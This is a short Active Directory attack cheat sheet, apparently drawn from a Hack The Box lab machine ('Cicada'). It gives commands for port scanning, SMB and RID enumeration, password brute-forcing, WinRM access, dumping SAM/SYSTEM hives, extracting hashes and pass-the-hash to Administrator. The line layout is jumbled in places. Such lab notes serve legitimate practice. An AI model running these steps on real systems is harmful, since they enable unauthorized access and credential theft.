Easy Box:
Here’s an enhanced AD exploitation methodology with commands for each step:
Methodology for AD Enumeration and Exploitation
1. Initial Reconnaissance and Scanning
Identify Open Ports: Use
to scan common AD ports.nmap $target --top-ports=1000 -sV -v -sC -Pn > nmap.out
Host Configuration: Update
with the target hostname if needed.echo "$target cicada.htb" | sudo tee -a /etc/hosts
2. SMB Enumeration and Credential Gathering
Anonymous SMB Access: Use
to list available shares.smbclient -L //$target -N
User Enumeration with RID Brute-forcing:
nxc smb $target -u 'anonymous' -p '' --rid-brute 3000
SMB Information Gathering:
enum4linux-ng -A $target
3. Password Discovery and Validation
Testing Credentials: Use tools like
to test passwords.hydra -L usernames.txt -p $password smb://$target
Access Restricted Shares with Discovered Credentials:
smbclient //$target/DEV -U 'username' -p 'password'
4. Initial Foothold
- Remote Access: Use
to log in with valid credentials.evil-winrm -i $target -u 'username' -p 'password'
5. Privilege Escalation
Identify Special Privileges:
whoami /all
Backup Privileges: Use
to save critical files to accessible locations.reg save hklm\sam c:\Temp\sam reg save hklm\system c:\Temp\system
6. Extract and Use Password Hashes
Download SAM and SYSTEM Files:
download c:\Temp\sam download c:\Temp\system
Dump Password Hashes:
python3 secretsdump.py -sam sam -system system LOCAL > hashes.txt
- Root Access: Use
with Administrator hash.
evil-winrm -i $target -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:hash'
This methodical approach covers enumeration, initial access, and privilege escalation for AD exploitation for an easy box. Took from Cicada machine.